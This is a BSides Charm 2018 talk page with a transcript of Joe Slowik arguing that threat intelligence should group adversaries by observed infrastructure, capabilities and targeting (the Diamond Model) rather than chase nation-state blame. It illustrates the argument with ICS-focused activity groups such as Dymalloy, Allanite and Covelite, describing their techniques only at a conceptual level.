
Threat Activity Attribution: Differentiating the Who from the How

BSides Charm · 2018 · 54:06 · 29 views · Published 2021-05 · Watch on YouTube ↗
Speakers: Joe Slowik
Tags: Category: Technical · Team: Blue · Research: Methodology · Style: Talk
About this talk
Attribution-focused threat intelligence typically chases nation-state identities, but this approach offers little tactical value to network defenders. Joe Slowik argues for activity-based attribution instead: grouping threats by tactics, techniques, and targeting patterns to build actionable defense strategies and monitoring playbooks, rather than pursuing geopolitical blame.
Original YouTube description
Threat Activity Attribution: Differentiating the Who from the How

Typical attribution focuses on 'whodunnit', with little clear benefit to network defenders. This talk will consider attribution by activity and behavior, to develop strategies, playbooks, and responses to types of attack, while leaving nation state attribution to amateurs and reporters.

Presenter: Joe Slowik (@jfslowik)

Joe Slowik currently hunts ICS adversaries for Dragos, pursuing threat activity groups through their malware, their communications, and any other observables available. Prior to his time at Dragos, Joe ran the Incident Response team at Los Alamos National Laboratory, and served as an Information Warfare Officer in the US Navy. Throughout his career in network defense, Joe has consistently worked to "take the fight to the adversary" by applying forward-looking, active defense measures to constantly keep threat actors off balance. When not hunting adversaries or playing with open source security projects, Joe loves playing ice hockey and building Legos.
Transcript [en]

Great.

Plenty of seats in the middle up here, folks, if you're standing in the back and looking for a spot. It's something like Southwest Airlines: if you're last in, you're sitting somewhere in the center. All right, I think we're good to start.

All right, hey everyone, how's it going? My name is Joe Slowik. Today we're going to talk about a subject near and dear to my heart as a threat intelligence analyst: we're going to talk about threat activity attribution, and how the way that most people are doing it is, in my opinion, wrong. So, contentious subject off the bat. Really, this is more ecumenical; I just have a different way, or my company has a different way, of looking at things than others, but we're going to go into some of the differences that surround that and why there are other ways of thinking about this process than what we're used to.

So who am I? I am Joe Slowik. I'm a threat intelligence analyst and adversary hunter, a much cooler title, working for Dragos, which is down the road in Hanover. Prior to that I ran the incident response team at Los Alamos National Labs. In fact, I still live in Los Alamos, and Dragos is very happy to let me work full-time remote, so most of the time at this time of day I'm in boxer shorts, just kind of sitting in my office doing my own thing. Before that I was an Information Warfare Officer in the Navy, and way before that, I didn't have a CS background; I actually dropped out of graduate school in philosophy at the University of Chicago. So that Navy-philosophy background means that I can curse very eloquently, but I'm going to try not to do that here.

So what are we going to talk about today? Today we're going to talk about typical attribution, because you can't rail against something unless you define what that thing is. So at least I'll present to you what I find to be typical attribution when it comes to threat intelligence work. We'll talk about what the purpose of attribution should be from the defender's perspective, go into a concept called activity groups, which will fuel an alternative definition for attribution techniques, talk about behavior-focused attribution, then go into a couple of really cool examples that tie into some high-profile activity that's gone on in the industrial control space, because that's what I do. My company is an industrial control system security company, but I think they'll resonate, because you'll recognize some of these things from recent headlines.

So traditional attribution is very similar to this terrible report that was put out by another company several years ago. It typically focuses on who, whodunnit: look for some sort of identifying details within the data and tie these back to some concrete entity that we can point at and blame. In the case of this one there was a lot of really bad data involved, and while there's probably no doubt that the Iranians were doing some shenanigans at this point in time, what was put out in that report, in the drive to push a narrative that, you know, "hey, the Iranians are doing all this malicious cyber activity and they're going to turn off the lights" and such, resulted in some truly terrible conclusions.

But enough bashing other people. Really, what we're looking for is: what are the benefits of this traditional way of looking at attribution? Quite frankly, it satisfies a very primal human need: whodunnit, who do I blame, who's at fault? I want to point a finger at someone and call them out and make them stop. It frames matters in a way that's cognitively not easy, but it makes sense to us. We like to look at things in narratives or stories: I want to tell a story that this action happened, and the person who did it was this guy, and it resulted in these sorts of things. Well, identifying who owns that action or who performed it is very fundamental to how we want to think about things.

The problem is, doing this sort of attribution is really hard. Typically our only collection, unless you're in some spooky three-letter agency down the road from here, all you really have to work with are technical artifacts that you might have gathered in an incident response scenario, or harvested from public or commercial data sets. You don't really have access to things like the emails the adversaries were sending back and forth within their own network; that would be very strange. So as a result you really have to infer intentionality from what you can observe, and those technical artifacts do a really poor job outside of broad brush strokes: this is ransomware, this is an information stealer. It's hard to get a feel for who's really behind this and why they are doing it.

Most importantly, and I think this doesn't get mentioned as often as it should, a preoccupation with trying to come up with attribution based upon an identifiable entity really plays into the possibility of cognitive biases. So if you assume that, oh, the Russians are doing it, and I run, I'm having a problem thinking of an example off the top of my head now, some organization that is immaterial in the grand scheme of things, the Russians are not coming after me. That may be true, may not be, quite frankly, and I think this was a point that was made very well at the keynote today and something I'd like to emphasize personally: you don't get to choose who's your adversary, they choose you. So really, identifying more along the lines of what actions are going to take place and how to respond to them is where you should be going.

Furthermore, and this is where I think the industry needs to wear a hair shirt, a lot of companies are really hot to trot for saying, yes, we know North Korea is responsible for this. But the problem is that, based upon that same data collection issue I mentioned earlier, yeah, we can maybe get just far enough, based upon some malware similarities, some IP addresses, maybe language sets, although none of this is really definitive in and of itself, to say that, yeah, it was probably country X. We take the media bump, but then we can't really go any further than that. And it's disingenuous to think that all entities operating under the umbrella of the Democratic People's Republic of Korea, or the Russian Federation, or the People's Republic of China, or the United States are really the same team. There are different groups that are operating under these broader aegises, so they have different motivations, different techniques, and different ways of operating. So as a result we don't really get a meaningful look at what sort of distinction we're trying to make in this sort of ham-fisted attribution, and that doesn't seem terribly beneficial.

So here's some media examples: Metrolinx hacked by the North Koreans; Russia behind NotPetya; "cyber attack targets safety system at Saudi Aramco," which was especially fun for me since that related to the TRISIS incident that my company did a lot of research on. But all of these are really trying to go for generating a certain amount of headlines, and I don't want to call this out too negatively, because if you look at the general populace and what kind of publications we're talking about here, Washington Post, Foreign Policy, Ars Technica, the Star (I forget where I pulled that from, my apologies), these are all mass media publications. These aren't technical journals, these aren't white papers, these aren't malware analysis reports. So there's a limitation to how deep we can dive here. But in presenting these things as being black or white, country A or country B, we're covering up a lot of nuance that's important to note in how these sorts of activities take place.

So what do we gain knowing that country X is responsible for event Y? And I say this from the perspective of network defenders. From a network defense perspective you'll likely get nothing, or, for that same cognitive bias issue I talked about, it might be damaging: oh, the Chinese just want to steal information; the Russians are really shifty and they can burrow in networks for years and we'll never catch them; and the North Koreans are destructive. All of these are assumptions that can potentially damage how you approach an incident if you're bringing into it a preconception of how that incident will play out.

Now, having said that, again, this is purely from the network defender perspective. If you're a policy maker, maybe even a C-level executive, it might make sense to know who was responsible. I would like to think that the President of the United States has some conception of who's to blame for an incident, therefore informing certain policy choices. But none of us in this room, although these days who knows, is going to be president anytime soon. Really, what we're looking to do is try and figure out a way to defend the networks that we're responsible for and secure those networks from an adversary. So determining who is responsible, it's nice, but it doesn't have any real specific value for defense. But identifying how an attack took place allows us to inform defense and try and build a more effective means of responding to data, based upon the threat profile that you develop for your organization.

So what attribution should do is that, as a result of getting an idea for what sort of entity is responsible and how they operate, you can align resources to meet that adversary, identify tactics, techniques, and procedures, and then focus your defense in a way that allows you to maximize what limited resources you have available against the threat landscape that you actually face. And ultimately, if it doesn't somehow assist you, inform your defense, make it easier for you to use the resources that you have, what's the point? It's a book report then. I read something that's entertaining, but it doesn't help me do my job. Those sorts of things might be fun in our spare time, but I don't know about the rest of you, I only have so many hours, and I spend way too many of them as it is working in information security. I want to make sure I'm getting the most value out of those.

So what attribution should do is follow a general process, and, I'm assuming we're in the greater Baltimore area, how many people have a DoD background in here? Hey, people are being honest, okay. This will look a lot like the intelligence cycle. So really what attribution should try and do is: an attack takes place, either against your organization or against a third party; try and collect and aggregate data; record the context around which it happened; then from there start turning that raw data into information; formulate conclusions based upon what actually happened within the environment, what actions took place, the progress of events from A to B to C; and then develop a conception of the adversary, not based on who you think they are, but rather how did they behave? How does the adversary act? What are their targets? What are their intentions from a technical perspective, their infrastructure, what did they try and get to?

Now the results of this are that, one, you get intelligence, that's my field: track how the adversary operates, learn to try and anticipate activity based upon not specific instantiations of behavior but rather generalizations of how that adversary behaves, which leads into the next step, and this was mentioned in an earlier talk on incident response. Having that idea then lets you begin to develop playbooks for how you're going to respond. When I know that this particular adversary has compromised my network, I have a reasonably high confidence that their follow-on actions, their follow-on toolkits, look like these sorts of entities, and that allows me to prioritize my response to that adversary. And finally, from a remediation perspective, it gives you an idea for what sort of things you need to go in and clean up: what sort of persistence mechanisms may have been in place, what little toys and fun things might have been left behind after you clear away the most obvious pieces of the intrusion.

So ultimately we really want attribution to prepare and enable defenders. If it doesn't do that, I'm not interested. This allows us to improve defenses and potentially anticipate attacks, as long as we have good data collection on how these adversaries are operating. Anything else is superfluous: you get flashy media headlines, provocative stories. It could even cause some level of danger by pointing fingers irresponsibly at other organizations and saying, nope, these guys are responsible, when no, those guys weren't responsible whatsoever. False flags come up a lot, and the Olympic Destroyer example with the PyeongChang opening ceremonies was a case study in that, where it's like, oh, South Korea got attacked, must be North Korea; wait a minute, it might look like the Russians; wait a minute, maybe they want us to think that it looks like them. You go down a rabbit hole really fast, instead of just approaching that scenario as: here's a wormable infection vector that's using credential stealing and replay to spread throughout a network for destructive purposes, full stop, respond to that. Doesn't matter who the hell is responsible for it; you've got an idea for how to approach that problem.

Now, the way that we do this at Dragos, and that I approach this personally, revolves around a concept called activity groups. It's a methodology for defining actors not based on who they are but how they operate. So the who in many cases is fundamentally irrelevant, it could be anyone, but here's how they act and here's what they're up to. So the focus really is on observables. If it's not something that you see, not something that you can test, not something that you can play with, it's a theory, it's an intuition, or it's a really bad assumption. So you need to avoid speculation and inference, get away from, again, potential cognitive biases, and look for a definitive picture of how an attack took place based upon concrete data retrieved from either the incident or from outside sources and enrichment.

So in looking at this I like to call out an example. Going back to what I said earlier, U.S. computer network operations activity is not a monolithic entity. Neither is Russian Federation computer network operations. Instead, you have a command authority, Vladimir Putin's up here; after that, okay, you'll have some development teams, these are the guys who put together your malware, do some other stuff, your specialists creating tools; and then off of that you've got a bunch of different operations teams, you've got the GRU, the SVR, the FSB, or whoever, that actually go out and execute. Not only that, but the SVR itself, just like the U.S. military, is not a single monolithic organization either: they have team A, team B, team C. All those teams have different goals, different targets, different mission sets, and they probably have operational tells. So breaking this down on an activity group basis moves us away from a lot of what you see with attribution that really focuses on development teams, what does the malware look like? Well, the malware might be shared by a bunch of different people that are doing different things. It gets us one further level down to where the rubber meets the road, and we see these actors from a defensive standpoint: who's actually trying to break into my network?

Yeah, so traditionally we're focusing on readily observed items: C2 IP addresses, and geolocation off of that, because that's really useful; malware samples, which, it's important, your tools tell a lot about who you are, but tools can be reused, repurposed, stolen, and used by other entities completely separate from their originators. So as a result, really going back to that previous slide, development teams get a lot of attention, but the actual operations components of computer network operations don't get the attention they deserve, when that's really fundamentally what we as defenders need to worry about. And I keep saying defenders; if there are red teamers in the room, it's okay, you don't have to acknowledge yourself, we'll make fun of you later.

So breaking out operations: different operations teams can use a similar tool set for different operations, and one of the examples we'll talk about in a little bit really goes right to this point. But a behavioral approach to identifying these entities makes sure that we can actually break these out and track them from a perspective that matters to how we're going to organize and implement our defense. The goal is to identify operations teams by their behaviors and, to the best that we can, determine their objectives. That could be by industry vertical, could be by the distinction between data stealer versus malicious attack, disruptive attack, etc.

Now, informing how we define an activity group is something that I am obligated to present as being an important document, because the man who authored it is my boss: the Diamond Model of Intrusion Analysis. So this is something put forward by Sergio Caltagirone, my boss, and two other guys who I'm sure are important, Andrew Pendergast and Christopher Betz. No, it's a really good paper, I highly recommend everyone read it, but maybe not right before bedtime. It really does approach this idea of how to go out and, well, this paper specifically focuses on how to use this for intrusion analysis, but it can be extended in order to define threat intelligence activity and the sort of attribution we're talking about right now. So it's called the Diamond Model; I wonder what it looks like. Looks like that.

So really it's a concept where you have, at its center, here's your activity group. What defines what an activity group looks like? Well, each of these vertices: you have an adversary, yeah, an adversary, the who, it's just one part of the whole, and not only that, it's not even the most important part. But then the adversary implements infrastructure, the means by which they connect to a victim, and a capability, how they will then impact that victim environment, which lastly goes back to the victim or target. What is this infrastructure used to deliver, what capability, in what environment? And you take all of this as a whole, and that gives you a conception of, oh, what does this look like? Who are these people? How do they operate? What are their fundamental goals from an operational perspective?

So analysis in this case primarily focuses on the technical observations that are available to us, but using them in a way to abstract from the particulars to come up with a general conception of behavior. So the main things we'll focus on are infrastructure and capabilities. Like I said earlier, the adversary can be abstracted; you can give them names, funny names, My Little Ponies, Pokémon, something. I'm wearing my Pokémon shirt today, by the way, my daughter loves this shirt, so if you can't make it out, check it out later. And then the victim might be useful for parsing out campaigns or trying to figure out what applies to your threat model, but it's really focusing on that middle of the diamond and looking at those technical indicators to figure out what it is that you're looking at.

So infrastructure, like I said before, is simply the means through which a capability is executed. It provides a link from the adversary to the victim, the means through which a capability will be deployed. And in looking at this you can categorize infrastructure through both atomic and behavioral, or, brain fart, complex identifiers. So atomic elements of infrastructure are your traditional IOCs: you have an IP address, a domain name, maybe a few other sorts of things. It's very relevant to an identified event and critical from an incident response perspective, but from a moving-forward perspective it's absolutely useless. IP addresses change, domain addresses are a dime a dozen, especially now with all the stupid TLDs we have. So it's not necessarily helpful to characterize future activity based upon a single atomic infrastructure IOC. But if you abstract from this one layer higher, or deeper, take your perspective, you can start picking up trends and patterns in what kind of infrastructure they are using. This is less likely to change, because everyone has tendencies, laziness, a way of operating, especially when you start talking about large bureaucratic organized environments. It's like, well, this is how the SOP is written, this is how I'm going to register dirty domains. So you get an idea for how this adversary is going to go about continuing to at least form the baseline of their operations.

So examples could be things like SSL certificate creation and infrastructure types and themes. Examples of this that I like to call out a lot in my own reporting: what kind of infrastructure do they use? Do they register their own devices, do they buy their own virtual private servers, or does your adversary go out and compromise some poor university and use a bunch of servers sitting over there as their hop points and their exfiltration points before getting back to their own network somewhere? Hosting and registration patterns are a good one. I was kind of upset to see that they put this out there, I believe it was ThreatConnect had a pretty interesting article about APT28, Fancy Bear, domain and registration activity that has been the same for five years. Maybe it won't be now, since it's very public at this point, but these guys just kept doing the same thing because it worked and no one was really catching on to it all that much. And then another one that's interesting is SSL certificate reuse. Are you reusing the same SSL certs? Maybe you're generating new certs, but maybe your SSL cert metadata looks very similar across each cert. APT28 provides another good example there, with some of the cert metadata on a lot of their items for the course of about a year and a half. We can go into that as a sidebar; we don't have all that much time.

So anyway, we've talked about infrastructure. What about capabilities? Works kind of the same way. It's what an adversary utilizes to achieve an objective against a victim: how do I get effects on target? Sorry, I used to be in the military. It's primarily behavioral in nature when properly implemented, but it can include indications of intent. As a result, going back to what does this software do: does it overwrite the MBR and shut the computer down? That's a wiper. Does it search for all .xls and .doc files? That's a data exfiltration tool. So it gives you an idea of intention there, but we don't want to read too much into that necessarily. And again there's an atomic aspect to this; this is your traditional, hey, I have a hash value, I have a registry key, maybe some other sorts of things that you can pick out. But just like the infrastructure items, they're easily changed. Hash values are trivially easily changed, and even things like reg keys, mutex values, etc., it's a means to an end. It's not necessarily something that's going to persist beyond a single action, maybe a single campaign, unless someone's a really bad adversary.

But trying to understand the capability by understanding the underlying behaviors it's trying to achieve is really important. This goes to how the adversary operates: what actions are they typically performing, what methodologies are they implementing? It's almost like the difference between pseudocode and your ultimate compiled code. The pseudocode, or at least your source code, is probably not going to change all that much; you can make some changes around the margin, but that's work, and no one wants to do work. I'll make a couple of edits, recompile it, and boom, I just defeated antivirus. I use PESpin, I defeated antivirus. But the fundamentals behind it are going to remain rather the same. So the goal is to build a picture of the adversary's operations, what they're trying to achieve and how they're trying to operate, rather than going towards the individual identifier for a specific event.

So examples of this would be intrusion techniques: are you someone who is using custom malware or, as we talked about this morning at the keynote, living off the land? What sort of coding and deployment consistencies are in place? Do they always use the same language? Are they reusing the same functions and not changing up compilers often enough that you could actually pick out specific functions in byte code? That was the case with APT3, with a very specific timestamping function: for almost 10 years they did not change that piece of code, did not change how they were compiling their malware. Awesome little signature. And what tendencies do they have for persistence? Yeah, they create a run key, but how do they go about doing it? Or what sort of things are they dropping on target to make sure that they can stay in that environment after they get identified, or to be able to come back and revisit it later on?

So, putting it all together: I want to characterize adversary activity, identify those commonalities and general trends in order to build that diamond picture, but basing this off of the observed behavior that we find as a result of intrusion events, either stuff that we witness ourselves or by doing some hard work and digging into what data is available to us from external sources, and then design our detections and alerts around that. You don't want to detect against what someone might do; you kind of want to, it's good to try and stay ahead of the game, but invest your resources in the things that you know the adversaries that you face are likely to use against you. This goes into an entirely different conversation, threat profiling and identifying threat models, which is another hour on top of this, and no one wants to sit here for two hours, and they won't let me, so we won't get into that this time around, but I'm happy to talk about that anytime if anyone's interested. Not likely, but...

So looking at this in practice: really you want to leverage all the available evidence that you have at your disposal to build this. If you're not using all the data, or looking for more at every iteration, you're doing it wrong. There's always more that we can find, both to capture how things change over time as well as to improve the fidelity of the picture that we have of what activity we're observing. And when it comes to differentiation, it's a simple rule: any two unique vertices on the Diamond Model means a new activity group. So unique capabilities, unique target or victim, okay, that's a new activity group. Unique capabilities and infrastructure, new activity group. It allows us to try and sort out matters and break things apart based upon how we'll actually respond and react to them as we observe them.

Let's talk about some examples to illustrate this. I'm doing really good on time; probably also talking really damn fast. So the first example we'll talk about is one that I like to rage about a lot in a number of ways, because it just kind of bugs me. So Allanite and Dymalloy, two Dragos-specific terms, and Dragonfly. These are all Russian-associated; we don't do nation-state attribution at my company, but others are saying this, so we'll just say maybe it's Russian. So, multiple reporting on Russian infiltration of U.S. energy and ICS-related companies in the summer of 2017. This eventually, multiple threads of reporting, technical reporting and media reporting, combined what we feel, and can prove based upon the technique that I've just spent the last half an hour railing at you about, really represent multiple different activities: probably related, but different enough that it's important to differentiate them from a response and monitoring perspective. The resulting picture that we're provided as a result of the who-focused attribution is something that's less than ideal from a defender's perspective.

So going back: the Washington Post published a nice little article that U.S. officials say Russian government hackers have penetrated energy and nuclear company business networks. I forget if it was WaPo or if it was the New York Times, but someone pointed out a very specific nuclear power plant in Kansas as being a victim, which was not nice. But anyway, so it's like, okay, we had this going on. The government name for this campaign was Palmetto Fusion; that's how we referred to this activity initially for quite some time. The reason we know that is because the DHS report on that was TLP, it wasn't Red, I think it was Amber, but it quickly went TLP New York Times, and this got its way into the media anyway.

After that we had Symantec come out with, in many ways, a really good report on something that they called Dragonfly. Now, for those of you with some experience in the ICS security space, Dragonfly should ring a bell. Dragonfly was an actor that was really active in industrial control related intrusions from about 2012 to 2014 or '15. They had a really cool piece of malware called Havex that was able to poll devices using the OPC protocol, do some other gnarly things. Well, Symantec presented some activity that looked a little bit like the Palmetto Fusion stuff but was different in some other ways, and rolled it all into this Dragonfly 2.0: Dragonfly is back, there it is. And then fast forward a few more weeks, and then US-CERT kind of stepped in to save the day. Is there anyone from DHS here? Okay, all right. Heart goes out to you guys, man, you guys are doing a good job, but not necessarily always with everything that you need in order to do it. So TA17-239A came out, October time frame, that took all of this activity and combined it into "this is what's going on." It got revised earlier this year, a couple weeks ago, pretty much the same as the last report except this one said all this stuff still holds, and it was the Russians. Now, maybe we gained something there, but I would venture that, not really. None of the underlying fundamentals here are any different. People still shouldn't be poking around in power networks; I don't care who the hell they are.

So going to an activity recap, what does this look like? In July we had the Allanite activity; October we had the report on Dymalloy, Symantec's continuation of Dragonfly, followed quickly by US-CERT; and then moving into the revised US-CERT, meeting that very critical whodunnit criteria. But there are a lot of distinctions here. Among other things, just from a simple time perspective: the original Dragonfly was, you know, early 2010s, somewhat early 2010s, 2013, 2014, that time frame; then you had this Dymalloy activity from late 2015 to early 2017; and then the Allanite or Palmetto Fusion activity doesn't really appear until the end of May of 2017, and a lot of it looks like it's kind of continuing. The time differences in question also align with substantial changes in tactics, techniques, and procedures.

So for Dymalloy, these guys, they're probably guys, their initial access: phishing, strategic website compromise. This will look familiar in a subsequent slide, but I'll explain how that's different. They deploy some implants. Dymalloy liked using, reusing, commodity malware for all of their operations, so they used a couple remote access tools or trojans, I mean, if it's not pretending to be something else, is it really a trojan? Anyway, it's a RAT: Karagany.B, Heriplor, a couple other things kind of associated with a lot of crimeware stuff. There's nothing really unique about it, but not using a custom platform. And then doing something similar for backdoors, using Dorshel and Goodor for a backdoor to maintain access to compromised devices. Once they're in places that they wanted to go to, they deployed a couple of different techniques: so they were doing credential capture through a customized program that incorporated the Mimikatz source code and then added a couple of other things on there to do things like harvest SSH keys, harvest certificates, etc., and from a data collection standpoint they had some scripts set up in order to harvest documents and gather other intelligence info of interest.

Okay, that's how this looks. We just talked about capability right here. What's it look like? Well, there's a phishing message, which is ironic if you know what ISO 27k is, it's an information security standard. Underneath the covers is this monstrosity right here. So this goes back to a technique of prompting an external SMB connection using the file-colon-whack nomenclature pointing to an adversary-controlled IP, and in the case of Dymalloy they put this base64-encoded-looking thing here for a PNG. Okay, that's kind of interesting. What this will do is that that outbound SMB connection

along with the attempt to like hey i want to talk smb because your network is not poorly secured and you're letting me talk out on 445 is you'll get a windows authentication attempt that ships with that which could be broken in order to harvest credentials to get into the network that's the whole idea for that initial access it wasn't trying to deliver a fish in the traditional sense of like i'm going to drop a malicious document that's going to exploit you it's just trying to get this to come out there in order to harvest credentials and rdp right back into your network alanite is similar but different all generalizations are stupid so you'll look that from an initial access

standpoint phishing and strategic website compromise huh that looks familiar we'll get back to that but then moving on from that there's next stage operations all system scripts publicly available tools powershell scripts and things of that nature there's no real malware whatsoever with the exception of some use of mimikatz like tools all this was for credential capture and reuse throughout the network uh plus from a backdoor perspective like you know they were this entity relies on being able to capture and replay credentials to move around to ensure that they were continuously capturing credentials in the target environment they used a really gnarly technique of creating a link file lnk file with a icon image that used the same

reference to an external object with the file command so you load up start menu or whatever and boom there's the icon it tries to call back call back out over four four five so you get another replay of the credential harvesting attempt that's kind of cool but anyway like completely relying on being able to pivot through legitimate system means throughout the network from an information collection perspective uh just seeing lots of publicly available password cracking uh examples mimikats uh some mimikatz variants uh i forget the network capture tool but just things you can download off of github no customization whatsoever and using rdp to move around and transfer files their phishing's a little different especially because the activity itself

going to the targeting victim aspect was laser-like focused on energy utilities so what they were doing was sending out fake resumes some really good fake resumes with the exception that they sent cvs to targets in the us and resumes to targets in the uk now if you know the difference that is not how that usually works but other than that they were doing a really good job like hey this guy actually looks like he knows his crap and would probably make a good controls engineer higher under the covers you see something similar except where it's hosted within the you know we're talking compound document formats here is you had it within the settings xml branch and instead of

seeing the base64 flagged or fingerprinted ideas you're just getting this normal.m so looking at a template file so again there's a lot of similarities here i'm buying that but the way that we're talking about implementation also looks a little bit different so i'm not going to stand up here and say that these groups are completely unrelated and these might be the north koreans but we're seeing a different instantiation of the activity in question but then moving away from some of these operational uh bits there's some really significant targeting differences so dymaloy got its start in turkey specifically with an energy company based in ankara before moving on to a lot of european targets and then some

us entities got hit in the bargain broad-based ics targeting advanced manufacturing oil and gas electric utilities etc alanite however only focused on the us and the uk maybe ireland that's an open question because one of the phishing messages was just a plain text article or copy paste article about a energy substation construction project that was having pollution impacts on a tiny river in ireland it's very specific i don't know why they would care about ireland but you know so be it but the main thing is that all of these were focused on the energy sector so looking at this within the components of the diamond model we're seeing significant differences in terms of both the capabilities that were

executed yeah the same smb thing is being leveraged but being leveraged in different ways so it could be an evolution of an existing adversary or it could be someone you know saw the i believe cisco taylor's published the first public article that i know about this technique like oh that looks pretty cool we'll do the same thing and then on top of that you have well how were they impacting host environments how are they getting in and staying in you got one group that's using a lot of off-the-shelf malware the other group that's doing complete script use and living off the land techniques and finally in terms of what they're going after you've got one that's solely focused on

us uk electric utility environments the other being much more broad-based ics related targeting so at that point like you know this looks significantly different enough to me that at the very least we have a couple different operations teams here so again my opinion they look substantially different from each other maybe i haven't convinced you we can find it out later in the parking lot uh you know the main thing is they may be related one may be an evolution of one another but based on the available evidence they're not the same and making them look the same or saying that they're the same really makes it a little difficult for us to defend against it because the implications are

we've got different targeting and different techniques which mean different responses like yeah it's important to really you know bone up on your ability to detect and defend against living off the land technique since everyone's doing it now it's the new hotness but you know from a perspective of who's doing it to me to my industry to other organizations like me again we don't have infinite security budgets gotta focus on the things that are most relevant to you in the here and now and try and take care of other things as they come along so if i'm prioritizing and i'm an electric utility i'm much more worried about alanite than i am about dimeloi necessarily and that shift in targeting uh indicates

potentially a change in priorities for these groups combining with two is one really just makes planning a little muddy and inhibits the ideal way of allocating scarce resources in the security environment so dragonfly dimly and alanite may all be the same adversary but different teams might all be russia it's very possible i'm not going to say that's wrong but they look different from each other such that you know at the very least different ttps and targeting over time make these look like different operations teams that might be all answering to the same task master at the end of the day and based on that we can come up with different ways of designing playbooks response procedures and methods of

tracking these entities that both have different levels of relevance for different organizations and different plans and procedures in order to go after respond and remediate after an intrusion now something a little different covelight another internal dragos term and lazarus so kovaleit was a group that we initially discovered through some kind of scary and very focused fishing in september of 2017 that was very targeted in some very specific u.s electric companies uh in a time when u.s north korean relations weren't all fuzzy and warm like they are right now we'll get back to the north korean thing well we don't have to i said lazarus group so a review of how that phishing worked what payload was dropped and

how the document was put together indicated a really strong overlap with the lazarus group who's the lazarus group one more slide sorry so here was publicity so nbc news north korea targeted u.s electric power companies oh that's kind of scary that got reported in early october the activity itself was middle of september lazarus group so what do these guys look like so the lazarus group is increasingly a catch-all for north korean linked activity dhs us government publicly refers to this as hidden cobra a couple of other terms that are out there as well but hidden cobra is kind of the all-encompassing adversary term uh i don't like the whole like the lazarus group because it doesn't look like

there's a lazarus group anymore it looks like there's this catch-all for all things that look like they're north korean and there's a bunch of different operations that happen to reuse a lot of the same techniques because if you look at lazarus you've got operations that range from hey i'm going to steal all your bitcoins to hey i'm going to steal your data to hey i'm going to wipe your network and say that i'm part of i can't remember the sony hack goofy organization that they flagged but the important thing is that something like lazarus has been active since 2012 and possibly even earlier than that doing all sorts of dirty things all over the world

now the link between kovaleite and lazarus is there's multiple technical overlaps the malicious document dropper was a big giveaway because it was a very specific uh decoding algorithm that was applied to embedded data within the document file to drop a binary on target and then on the malware that was dropped itself there was overlapping overlaps in terms of the code and functionality as well as obfuscation techniques any analysis techniques that were deployed additionally there was a little bit of infrastructure overlap but i think this is where this group messed up so typically lazarus in general and kovalei specifically they use compromised legitimate infrastructure a university in mexico a non-profit in western europe something along those lines

and typically you see specific infrastructure per campaign these guys messed up though because for the cobalite uh variant while kovaleigh differentiated itself from the majority of other lazarus observables and that it did a if else call out to three different addresses upon infection one of those addresses overlapped with a separate lazarus campaign that was centered around bitcoin theft like you guys messed up you forgot that one my opinion um so yeah reuse across campaigns kind of shoot some of that upset right in the foot now koblade itself you know fishing with malicious document attachment not a very good document on its face we'll see an example in a second but under the covers it's pretty

complex the embedded executable is built via a macro and then the exact executable beacons via a fake tls connection to the compromise c2 conser servers before reaching back to truly adversary owned infrastructure so the document itself is sent as a fundraiser invitation theme you know it looks like garbage like okay what's that mean and then when you enable macros you get this garbage i don't know about you but if i did that i would be calling my secure i would be my security team but you should call your security team if you saw that but beneath that uh what's going on well here's what the macro looks like so you've got a couple of different decoding routines

that do a bunch of shifting back and forth and picking from a bunch of arrays of strings and it's really decoding and building a binary from all that mess right there and we're not doing a malware analysis talk and not only that jimmy's here yell at me he's my colleague he's an rv wizard so he would yell at me because i'm getting something wrong so we'll get to that later but kovaleite and lazarus there's an overlapping capability so that same phishing document you can track back going almost a year and a half different campaigns associated with different fragments of overall lazarus activity stealing bitcoin from polish banks phishing a techno uh ibm actually so it's publicly available whatever

in the philippines going after a theater high altitude missile defense um contractor in south korea including this fishing campaign targeting u.s electric companies um some of the aspects are unique to covaleite so the multiple beacon ip thing that's only seen in the kovaleit sample as far as i can tell i've seen another lazarus example that does the try this guy try that guy then try this guy then wait and try this guy that guy and that guy all the other lazarus ones like try this ip try it again and there's differences in terms of sleep times and some other things you know but otherwise there's a lot of technical similarities between these things which makes it pretty solid that

either someone is deliberately going out making this look really close to lazarus to a degree that would require almost source code access or this is part of the same overarching group but there's a problem here lazarus simply encompasses too much stuff we've abused this term to the point where it's no longer all that meaningful to us that makes tracking identifying and defending difficult because how many of us have bitcoin wallets that we host in our organizations i hope i don't see any hands okay uh yeah all right we got one all right it's gonna be a fun party tonight but you know some of us might have defense sensitive data or other things which tap into

some of these techniques but not all of them so really what we want to do is try and break these operations that are all being accumulated under a single catch-all group to try and find some differentiation so we can focus attention and resources so the defender problem is to make sure that we have coverage for those things that are actionable and relevant to us you know he who defends everything defends nothing so saith frederick the great uh even though he was kind of a jerk but um he said something smart on top of invading saxony but the main thing is that we don't want to waste resources on unlikely items because we try and hold back all the things we're going to

let something through so instead of trying to defend against everything focus on the things that are most relevant to us most likely to hit your environment and then you know again assume breach sorry have a good ir plan for the things that you're not anticipating uh the lazarus approach by trying to defend against lazarus is way too broad there's too many things going on too many variants of the malware there's been a couple of shifts in ttps over the cast past couple of months actually because these guys are still active um that really prioritization is a critical thing in order to make sure that you you know keep touch with how this group is operating and evolving

so try and narrow your focus based on the activity in question cobalite is very specific in targeting if you're an electric utility you need to worry about cove light if you're a bitcoin wallet holder you probably don't need to worry about cove light maybe some covelight like behaviors but it's a different entirety when looked at as an activity than a lot of the other lazarus activity so the overlap in ttps can be distinguished by the uniqueness and targeting and some of the uniqueness applied to the otherwise generalized set of malware so filter the ttps filter out those things that relate only to the non-ics related things if you're an electric utility and avoid all the other lazarus stuff because

you're just gonna be generating noise so going back to our diamond model and we have some infrastructure uniqueness uh there is the one oopsy where they reused an ip uh but the victim target stuff really stands out capability is roughly the same although there's some uh differences there as well but these are our main differentiators against something that might be overall looked at as lazarus writ all so where are we right now well we're about 15 minutes before i'm supposed to get off stage but where are we in the presentation start summing things up ultimately what we want to do is we want to make defense manageable we want to break activities up into component parts that we can deal

with again not defend against everything defend against the things that are relevant to your environment your organization use your resources smartly against what is going to be you know what fits your risk profile track what matters and then focus your defense on that environment so again i mentioned earlier one of the key components to this and applying this usefully in your environments is really coming up with a good understanding of what does my environment look like who am i what do i do what are my sources of business value what are my sources of visibility what are my sort what are my areas of invisibility what are my strengths and weaknesses building that into a picture of what

